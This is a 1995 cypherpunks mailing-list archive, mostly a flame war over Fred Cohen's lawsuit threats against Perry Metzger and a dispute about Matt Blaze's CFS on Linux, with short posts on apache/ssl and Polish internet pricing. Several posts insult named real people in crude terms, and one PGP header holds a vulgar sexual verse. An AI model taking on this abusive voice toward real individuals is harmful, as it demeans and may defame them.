In-Reply-To: <199512231833.NAA07171@jekyll.piermont.com> from "Perry E. Metzger" at Dec 23, 95 01:33:45 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
X-UIDL: 819744158.001

> Fred Cohen writes:
> > The dollar value would be $1 plus a public apology plus all costs of the
> > suit plus my time to right the wrong (at my usual fee of course).  Of
> > course the fact that you have decided to make this posting in public
> > justifies my extensive efforts to clear my reputation which, unless you
> > apologize immediately will be surprisingly enjoyable for me.
> 
> Go and sue, Fred. Its what I have lawyers for. If you can even find an
> attorney willing to take your "case", mine will likely remind yours
> that lawyers can now be punished by the court in many jurisdictions
> for knowingly aiding in bringing frivolous suits. If you are seeking
> $1 in damages the court is especially likely to consider the whole
> thing a waste of time.

Your choice, but it's not a very nice Christmas present to find yourself
in litigation.  I'll give you till Tuesday to reconsider.  If I see the
public apology, I won't call the lawyers.

If I were you, I would talk to those lawyers of yours and get their
opinion of whether it's worth your while to be malicious toward people
in this way in exchange for defending against a law suit when all you
have to do to prevent it is apologize for what you now know to be a
falsehood.

- -> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 03:40:36 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: CFS and Linux
In-Reply-To: <9512231834.AA23326@all.net>
Message-ID: <199512231855.NAA07214@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Fred Cohen writes:
> > Go and sue, Fred. Its what I have lawyers for. If you can even find an
> > attorney willing to take your "case", mine will likely remind yours
> > that lawyers can now be punished by the court in many jurisdictions
> > for knowingly aiding in bringing frivolous suits. If you are seeking
> > $1 in damages the court is especially likely to consider the whole
> > thing a waste of time.
> 
> Your choice, but it's not a very nice Christmas present to find yourself
> in litigation.  I'll give you till Tuesday to reconsider.  If I see the
> public apology, I won't call the lawyers.

As I said, Fred, quit giving me "second chances"; either send the
process server with the court papers or let the matter drop. Don't
bother sending any more "just one more chance" messages to me -- I
won't be altering my opinion.

As for apologies, I have nothing to apologize for, so I have no
intention of apologizing to you -- ever.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (J.Francois)
Date: Sun, 24 Dec 1995 04:12:32 +0800
To: perry@piermont.com (Perry E. Metzger)
Subject: Re: Fred Cohen
In-Reply-To: <199512231845.NAA07203@jekyll.piermont.com>
Message-ID: <m0tTZVN-000xgEC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that Perry E. Metzger wrote:
 
 
> More Fun from Fred. For those that haven't been following, he
> threatened to sue me for quoting an Alice post as "Alice B. Cohen",
> and threatened to have his attorneys seize the machines the
> cypherpunks mailing lists run on for being part of a "criminal
> conspiracy" against him.
> 
> Perry

Maybe the Jargon File offers some insight:


:Mbogo, Dr. Fred: /*m-boh'goh, dok'tr fred/ [Stanford] n. The
   archetypal man you don't want to see about a problem, esp. an
   incompetent professional; a shyster.  "Do you know a good eye
   doctor?"  "Sure, try Mbogo Eye Care and Professional Dry
   Cleaning."  The name comes from synergy between {bogus} and the
   original Dr. Mbogo, a witch doctor who was Gomez Addams' physician
   on the old "Addams Family" TV show.  Compare {Bloggs Family,
   the}, see also {fred}.

It all starts to make sense now.....

Long Live Procmail! 
Mail filtering is cool......

=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
=========================No Unsolicited Email============================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: The Gray-haired Woman's Complaint

My back aches, my pussy is sore;
I simply can't fuck any more;
	I'm covered with sweat,
	And Tu have

iQCVAgUBMNxWfrbmxeO+s+1xAQGTzAP/VA7pG3vFTwx+OTS1tNLdua6rgieSPyez
eXdVUbVaVqdxCuRwFlpxDbZjKeclx9D3TZyPnnUF/ZDQf/Tb89+d8iLRz3SROVTZ
a0RK5tOFB1/E/d4lWK+rtd4q6fB2se1/NGUE5dC7l97njyQfgBJNE8KdZc9lcLNP
C3f9b9fgZGM=
=zRqP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sun, 24 Dec 1995 04:45:20 +0800
To: cypherpunks@toad.com
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <199512231904.LAA00483@slack.lne.com>
Message-ID: <4bhndf$avo@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray <ericm@lne.com> writes:

>I'm sure a number of people, myself included, would be willing
>to host the CP list should "Dr" Fred make good his threat.

And a number of people would no doubt start boycotting Dr. Freds company
loudly and publicly should he attack an innocent third party such as
toad.com.  Fred and Perry are two peas in pod, but as long as they
keep their disputes strictly between them I could care less.
-- 
"Home pages are the pet rock of the 90s.  We all have them, we all think
 they're very cute.  But in a few years we're going to look back and be
 pretty embarrassed."     -- Tony Shepps <toad@pond.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 24 Dec 1995 04:45:49 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: CFS and Linux (fwd)
In-Reply-To: <199512231633.KAA04297@einstein>
Message-ID: <199512232014.PAA23147@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> If you are going to do it, do it right the first time.
> 
> Second, I really doubt Blaze has a problem obtaining access to computing
> power and a $25 CD should be within his budget.
> 

What, exactly, is your complaint?  I'm honestly confused.

Please see my previous message on this subject for an explanation of
the situation regarding CFS with respect to Linux.

I'm not "refusing to support" anything.  I want to do whatever it takes
to get CFS (and other applications of strong cryptography) as widely
deployed as possible.  I am unwilling to allow supporting CFS to become
a full-time job, however, and I'm not going to apologize for that.

I have a Linux machine, in fact.  But I've tried to run CFS on it and it
seems to work fine.  I've not investigated further because that seems like
a poor use of my time given the large number of Linux experts (who know far
more than I ever will about the vagaries of the various Linux releases) who
have not come up with a satisfactory, general patch that runs on all the
various Linux platforms.  The problem seems to be that some versions of Linux
include an rpcgen that produces non-standard output.  I don't have one
of those versions, however, so I've not encountered this "problem" myself.

Again, if you want to see CFS, or any other software that I distribute, run
on some platform that I don't have, you are welcome to send me patches that
I will happily wrap into the distribution (as long as it doesnt break the
other supported platforms).  Until you do that, you have nothing to whine
about.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 24 Dec 1995 08:29:40 +0800
To: cypherpunks@toad.com
Subject: apache/ssl now commercially available
Message-ID: <199512232359.PAA19453@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I've finally gotten the licensing taken care of. Whee!
http://www.c2.org/apachessl/

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sun, 24 Dec 1995 06:14:49 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: CFS and Linux
In-Reply-To: <LFRkgD11w165w@bwalk.dm.com>
Message-ID: <199512232154.QAA05863@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just to pick nits...

> Everyone I know who writes code serously has at least tried
> Linux. No everyone uses it for serious work, but everyone at least
> played with it. Not having even tried suggests (to me) a regrettable
> lack of intellectual curiosity.

I do serious development work under Linux.  For example, I've been
doing development of PGP 3 on an IBM Thinkpad running Linux.  So, I
can honestly say that I use Linux for serious work...

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 24 Dec 1995 11:22:50 +0800
To: cypherpunks@toad.com
Subject: Re: Air Force hacks Navy? Eeeek!
Message-ID: <199512240246.SAA10574@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:57 PM 12/22/95 -0500, fc@all.net (Fred Cohen) wrote:
>I thought the ET article indicated an exaguration, but if it's true that
>there are no Battleships in the US Navy anymore and that the attack was
>run using DoD crypto equipment and networks, it's a heck of a lot
>different than buying an off-the-shelf Internet package and taking down
>the fleet.
>
>I have no doubt that someone with enough expertise, classified knowledge
>and equipment, access, and assistance can get some limited control over
>some US Navy ships for some period of time - but I seriously doubt that
>a computer whizzkid can take over the fleet from a PC via Email.

Depends on how much of a firewall the Navy's got; it may be that
the guy really did a dialin to the Pentagon using passwords,
or maybe that the ship really does have network connections
without adequate security.  People _do_ build dialin and other
gateways to get around corporate firewalls, in spite of
company policy; wouldn't surprise me if the military has the same problem.

About 20 years ago, you could dial an FX line in Des Moines which
connected to a line at Offutt AFB in Nebraska and autorotored to a radio
circuit up to Looking Glass.  Looking Glass had a small PBX; you could dial a 
2-digit extension to reach somebody on the plane, or dial back down
to the ground.  At one point, the radio officer on the plane noticed
two lights on on the PBX when nobody on the plane was talking on the phone;
the rapidly ensuing investigation found a guy in the barracks using 
a 16-button Autovon phone dialing through the system to call his buddies
in Guam.  As one might expect, the phone lines coming down from Looking Glass
are authorized to call anywhere in the world, at any precedence/preemption 
level they want to :-)  While I don't personally know either the radio
officer or the guy who got busted, I do have a friend who was around
there when it happened...  And similar nonsense is probably still possible
today, unless Murphy's left the military.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# .... Heading back to The Big Phone Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 24 Dec 1995 11:22:52 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: cyphernomicon FTP site?
Message-ID: <199512240247.SAA10588@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 AM 12/20/95 -0800, you wrote:
>At 12:59 AM 12/20/95 -0800, you wrote:
>>At 9:18 PM 12/19/95, Vinod Valloppillil wrote:
>>>Anyone know where I can FTP a full copy of the cyphernomicon?
>[Much deleted]
>>Anybody who plans to download the entire linear file and then print it out
>>must be missing a bits in his shift register.
>
>There are reasons to want a non-html version.  The best being uploading to
>your favorite text-oriented BBSes.  (Or crypto-oriented BBSes.)  Not
>everyone has access to the web.  (Yes, I know it is blasphemy...)

It's also nice to be able to read it offline, or feed it to grep,
or load copies of it to other sites to reduce congestion on Netcom...
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# .... Heading back to The Big Phone Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 24 Dec 1995 15:01:59 +0800
To: Eric Murray <perry@piermont.com (Perry E. Metzger)
Subject: Re: Fred Cohen: Re: CFS and Linux
Message-ID: <199512240623.WAA25485@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 12/23/95 -0800, Eric Murray wrote:
>I'd even be willing to testify in court as to the nature of
>Fred's reputation.  I'm sure the operator of the Firewalls list
>would be too.

Fred's reputation is so low he cannot be defamed.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 24 Dec 1995 15:01:37 +0800
To: cypherpunks@toad.com
Subject: Re: Fred Cohen: Re: CFS and Linux
Message-ID: <199512240623.WAA25488@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:05 PM 12/23/95 -0500, Steve Simmons wrote:
> Fred and Perry are two peas in pod,

Perry is an asshole.

Fred is a stupid ignorant asshole who talks nonsense.

Perry often mixes useful, accurate and informative information
in between the insults.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Sun, 24 Dec 1995 21:50:30 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Civility
Message-ID: <Pine.OSF.3.91.951223204036.5710D-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



Ladies and Gentlemen;
	As I am sure that most of you have noticed, this is a high volume 
list. I have just spent the last 20 minutes deleting personal attacks and 
non-crypto related junk from my mail. Normally, this list is of fairly 
high quality and I enjoy reading the technical and political discussions 
that appear here. It must be something in the water but lately the 
nonsense has reached epic proportions. 
	Now I realize that trying to get an independent bunch of people 
(as the cypherpunks must be) to conform to a minimum standard of behaviour 
is like herding cats ( I like that image! <g>) but in the interests of 
your fellow list members, please take the attacks to private E-mail. This 
might make the volume of crypto-related material managable to the rest of us.
	Let the flames begin! ( In private E-mail please!)

	By the way, seasons greetings to everyone!

Tim Philp
Brantford, Ontario,
Canada

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 24 Dec 1995 13:29:03 +0800
To: cypherpunks@toad.com
Subject: Re: Java and timing info - second attempt
Message-ID: <199512240510.VAA03013@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 PM 12/18/95 -0800, Jeff Weinstein <jsw@netscape.com> wrote:
>  In Netscape Navigator 2.0 Java and JavaScript do not have access
>to crypto routines.  At some point in the future this will probably
>change, but only after we understand the implications much better
>than we do today.

Doug and/or Amanda Barnes posted some Java crypto stuff a while back,
I think using RSAREF; don't know the platform issues.

As far as timing goes, Bad Guys can always run accurate timing on 
their own machines, even if Innocent Victims don't on theirs.
However, it may be worthwhile to allow the Java browser users
to set the resolution on the clocks available to Java scripts.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# .... Heading back to The Big Phone Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 24 Dec 1995 14:03:32 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
Message-ID: <199512240544.VAA05521@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


So the master is at last fallen.  Kudos to Mr. Jim Choate and Dr.
Dimitri Vulis for having the courage of their convictions to help
unmask AT&T's deceit in claiming to support Linux and free software
when, in truth, it is doing just the opposite.

Maybe, just maybe, we can seize this opportunity to advance the
cause of justice, if not justice itself (true justice would require
AT&T to recognize its obligation to our heros at Berkeley and pay
them their USD 25,000).  I call upon us all to expose AT&T for what
it is!  Had your software erased by the CFS install programme?
Return their own medicine!  Sue them!  Tired of Blaze's prattle
about how he is a Linux-lover even though he can't be bothered to
use Linux?  Challenge him!  Tired of AT&T and Netscape employees
stealing your resources?  Configure your servers to deny W3 access
to AT&T and Netscape computers!

Linux isn't perfect, but its open environment is a good start for
building REAL secure software.  Don't let AT&T's lies bully you
into abandoning it!  CFS will never run under Linux until it is
plucked from the monster's grasp.  We, too, are guilty when we
continue to invite the monster not only to walk in our midst
unchecked, but to sleep in our homes as an invited, nay, paid,
guest.


Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 24 Dec 1995 06:39:57 +0800
To: pagre@weber.ucsd.edu
Subject: Polish telco policy change
Message-ID: <199512232221.XAA26875@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Pardons requested from those who rightly try to keep Cypherpunks focused.

If any of you can think of ways to get this message out and about, you'd
be doing a Good Thing: without bandwidth, privacy means a lot less.


>------- Forwarded Message-------
>Date:          Tue, 19 Dec 1995 15:55:49 +0100 (MET)
>From:          Marta Dubrzynska <martad@pap.waw.pl>
>To:            Marjan Kokot <marjan@kud-fp.si>
>Subject:       Polish internet
>
>Dear Netpersonality,
>
>This is a request for help on behalf of the Polish internet. We 
>have one single internet provider in Poland: NASK. NASK has 
>bacause of an agreement with the Polish Telecom a 
>monopoly on lines connecting Poland with the rest of the world. 
>University's schools and commercial internet providers have to 
>get their acces from NASK. 
>Prizes of internet are high. A complete account with SLIP etc. 
>costs around 60 $ a month. Telephone costs are 3.7 $ per hour. If you 
>take into account that wages of around 350 $ per month are 
>considdered normal it is clear why internet is not used by so many people
>in Poland. 
>And now NASK announced that too many people are using the 
>internet and that they need more money to keep the lines open. 
>They decided that from January they would raise the prizes, 
>and that they would calculate costs per bytes sent or recieved. 
>Yes that's right, we have to pay for letters you send us and we 
>have to pay for WWW pages you download from us. This will mean 
>the end of most internet activity in Poland. 
>If you want to know the details you can find them at: 
>http://galaxy.uci.agh.edu.pl/~szymon/protest-eng.html
>http://www.put.poznan.pl/hypertext/isoc-pl/battle.html
>protest@uci.agh.edu.pl
>
>That's why we Marta Dubrzynska, Webmaster of the Centre for 
>Contemporary Art in Warsaw, (http://sunsite.icm.edu.pl/culture/csw/) and 
>Michiel van der Haagen, Net user (http://www.atm.com.pl/COM/michiel/) ask 
>your help.
>Can you make it clear to our Government and NASK that this policy is
>disasterous for Polish culture, economy and education? Please check out 
>these WWW adresses and react.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@wero.cs.byu.edu>
Date: Sun, 24 Dec 1995 16:04:38 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512240544.VAA05521@jobe.shell.portal.com>
Message-ID: <199512240748.AAA13767@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Sorry for being one of those who responds to Detweiler's troll...

> So the master is at last fallen.  Kudos to Mr. Jim Choate and Dr.
> Dimitri Vulis for having the courage of their convictions to help
> unmask AT&T's deceit in claiming to support Linux and free software
> when, in truth, it is doing just the opposite.

Patting yourself on the back again eh? I didn't know people as stupid
as you knew how to use email. CFS is Matt Blaze's toy. A toy. When ATT
starts charging money for CFS, then all your bitching and moaning
about ATT _might_ make sense.

Oh, by the way, since when did att "claim" to support linux?

> Linux isn't perfect, but its open environment is a good start for
> building REAL secure software.  Don't let AT&T's lies bully you
> into abandoning it!  CFS will never run under Linux until it is

Oh brother,  now I know for sure that this is a spoof. Nobody could
be this lame for reals...

Don

- -- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *






-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMN0F4cLa+QKZS485AQFjFwL+Pk6s59bAATKkSgoH4eGrdcDQ1gwA0Nog
Lih8rbkWD7RIf3g2g7xiaPnEI+HQBCWvSHkdeybZ8CPLC/E40ONHeA06+l+J6jDK
PpAskeZxu8aUKlyXDl3seIb3Xmguy+Mz
=3Kr4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 24 Dec 1995 15:14:46 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <199512231823.NAA07160@jekyll.piermont.com>
Message-ID: <Pine.BSF.3.91.951224012906.19267A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Dec 1995, Perry E. Metzger wrote:
> > Fred Cohen writes to me in private:
...
> 
> Let's see.  I guess I would start by having the police confiscate the
> toad.com computers becfause thay are part of a criminal conspiracy to
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
I didn't realize that AI research was that far along.  Can someone point 
me to the specs for the computer that can become a "part of a criminal 
conspiracy"??

EBD


> daamage my reputation.  Criminal because of the recent changes in the
> law that prohibit you from sending me information I don't want to get.
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 24 Dec 1995 15:17:15 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <199512231845.NAA07203@jekyll.piermont.com>
Message-ID: <Pine.BSF.3.91.951224013240.19267B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Dec 1995, Perry E. Metzger wrote:

> > Fred Cohen writes:
> > > The dollar value would be $1 plus a public apology plus all costs of the
> > > suit plus my time to right the wrong (at my usual fee of course).  Of
> > > course the fact that you have decided to make this posting in public
> > > justifies my extensive efforts to clear my reputation which, unless you
> > > apologize immediately will be surprisingly enjoyable for me.
> > 
> > Go and sue, Fred. Its what I have lawyers for. If you can even find an
> > attorney willing to take your "case", mine will likely remind yours
> > that lawyers can now be punished by the court in many jurisdictions
> > for knowingly aiding in bringing frivolous suits. If you are seeking
> > $1 in damages the court is especially likely to consider the whole
> > thing a waste of time.
> 
> Your choice, but it's not a very nice Christmas present to find yourself
> in litigation.  I'll give you till Tuesday to reconsider.  If I see the
> public apology, I won't call the lawyers.
> 
> If I were you, I would talk to those lawyers of yours and get their
> opinion of whether it's worth your while to be malicious toward people
> in this way in exchange for defending against a law suit when all you
> have to do to prevent it is apologize for what you now know to be a
> falsehood.


How, exactly, does Perry (or anyone else here) "know" it to be a 
falsehood.  Fred denies it.  If I was posting anonymously and was accused 
of being the anonymous poster, I'd deny it too.

Oh, I forgot, someone posting as one of the "Alices" denied it too.  That 
makes it conclusive. 

This anonymity thing is easier than I thought.

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 24 Dec 1995 17:44:54 +0800
To: attila <attila@primenet.com>
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <Pine.BSD.3.91.951224080819.26471A-100000@usr3.primenet.com>
Message-ID: <Pine.BSF.3.91.951224042445.20498A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Dec 1995, attila wrote:

> On Sun, 24 Dec 1995, Brian Davis wrote:
> 
> > On Sat, 23 Dec 1995, Perry E. Metzger wrote:
> > > > Fred Cohen writes to me in private:
> > ...
> > > 
> > > Let's see.  I guess I would start by having the police confiscate the
> > > toad.com computers becfause thay are part of a criminal conspiracy to
> > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > I didn't realize that AI research was that far along.  Can someone point 
> > me to the specs for the computer that can become a "part of a criminal 
> > conspiracy"??
> > 
> > EBD
> > 
> > 
> > > daamage my reputation.  Criminal because of the recent changes in the
> > > law that prohibit you from sending me information I don't want to get.
> > > 
> >
> 	the basis of the seizure is for evidence collection.  then they
>     take their sweet time scrounging the disks for evidence.  If no
>     evidence is found, they give it back --eventually.  I saw one case go 
>     by a couple years back where they were trying to make the computer an
>     accessory to the crime (I dunno, maybe it was supposed to auto-dial
>     and drop the dime --no that's in 18USC as failure to snitch!)

Much truth here, but not relevant to Dr. Fred's threat of a civil suit.  
He can't have his attorneys just call the FBI to pick up toad's computer.

CoS's seizure of computers, while shameful, was based on a different 
legal theory than the good Dr. can possibly allege. 


EBD


> 	of course, if there are drugs involved, they confiscate it as
>     spoils of the criminal act and the equipment is impounded and
>     eventually sold after conviction for the benefit of their slush funds. 
> 
> 	I would imagin you have seen plenty of the latter one in the
>     Federal attorney's office. this also gets into the issues of private
>     cryptography and that _everybody_ should give up privacy protection,
>     first amendment rights, etc. so uncle can catch a few dopers, gun 
>     runners, and other assorted malcreants [sic] --like the difference 
>     between {mis,mal}feasance: in both cases you get fucked, but 'mal' is
>     intentional... 
> 
>  
> > Not a lawyer on the Net, although I play one in real life.
> >
>     hey, at least you admit you're having a good time!
> 
> > **********************************************************
> > Flame away! I get treated worse in person every day!!
> > 
>     
> 
> --
> --------------------------------------------------------------------
> #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
> $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
> 2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
> pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)
> 
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2
> 
> mQCNAy5vBesAAAEEAN8cl6vHXrKZ9lFfZDgfyJRr3HidW77Uio7F25QF6QXca5z/
> AS3ZrWsa0CjF2nwrqmyb1E5no7dFB+70ZfK8233r7ykVkWRojT+0K71lnUZO4cjG
> +d19/ehXkDpkH3iHU7Uyo4ZdXLiI6uoFDS7ilzx8PCKcgvfq7b04kQrCC2kFAAUX
> tAZhdHRpbGGJAJUDBRAur/X7xUpiaI661j0BAbVUA/9RSKN5sOFVB4rjV6+a2aWD
> LjD5g/+eZaB/hI98qlPP+SBwzO3+K7+JWt3Fez0gKVju228ACGkvilg2VkMtQ0zm
> YCexYL0U9StzHt4xEpowpmaWx22jpEvWnI10LZvT/NO3uYg5r/ezVYc7autKvfvI
> rVOo322RkA0HNVV1rqjMGw==
> =UNt4
> -----END PGP PUBLIC KEY BLOCK-----
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sun, 24 Dec 1995 21:42:51 +0800
To: cypherpunks@toad.com
Subject: To Youall
Message-ID: <9512241324.AA23587@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


                       ^
                    _:(O):_
                  <<<<<+>>>>>
                     }}:{{
                  '^'^'^'^'^'
                ~~d^~q~V~p~^b~~
            ^ |[pg/M\pgvgp/M\gp]| ^
          g/M\pgp/M.M\pgp/M.M\pgp/M\p
        /M/:\M\V/M/:\M\V/M/:\M\V/M/:\M\
   ~==|\M/&:&\MVM/&:&\MVM/&:&\MVM/&:&\M/|==~
  *{$$$MeRrYxmaS$TocpunKs@eVeryWheRE.CoM$$$}*
   ~==|\/M\:/M\V/M\:/M\V/M\:/M\V/M\:/M\/|==~
      '{\O[o%[anDtimMIe&eLDee,to0]&o]O/}'
       ^/.\:^.^W^.^:^.^W^.^:^.^W^.^:/\.^        
           {p\qVp^q:p^qVp^q:p^qVp/q}      
             o=o\==o===O===o==/o=o
                x..X\..X../X..x
                 (dbdb\W/dbdb)
                   )'\\%//'(
                     '***'
                      &:&
                       :
                       .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 24 Dec 1995 04:29:29 +0800
To: perry@piermont.com
Subject: Re: CFS and Linux (fwd)
In-Reply-To: <199512231640.LAA07020@jekyll.piermont.com>
Message-ID: <199512231941.GAA00983@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> 
> Jim Choate writes:
> > 
> > > First of all, this is Matt Blaze's pet project, not a product of
> > > AT&T. It is given away for free and you should be happy to get it at
> > > all -- no one is obligated to give you a gift. Have you mailed him a
> > > Linux machine to do his testing on? Why do you assume he even has one?
> > > As it happens, he doesn't, and probably doesn't want to go through the
> > > hassle of paying for a computer and putting Linux on it.
> > > 
> > > Be happy he's given you anything at all.
> > 
> > If you are going to do it, do it right the first time.
> > 
> > Second, I really doubt Blaze has a problem obtaining access to computing
> > power and a $25 CD should be within his budget.

I am annoyed. Matt Blaze has no obligation to produce CFS for free, let
alone a version for dummies. And boy, are you a dummy. As someone who
has hacked away at CFS for a long time now on several platforms,
including linux, I can state that the issues of porting CFS to linux
were trivial and involved a one line sed on the rpcgen output. The more
recent versions of linux don't even require this.  Further, Matt is
hardly the government/corporate lacky that you suggest him to be. Why
don't you read some of his papers before you show your technical and
social ignorance? Get a life.

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  has stood still, who built the largest |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 24 Dec 1995 23:10:19 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
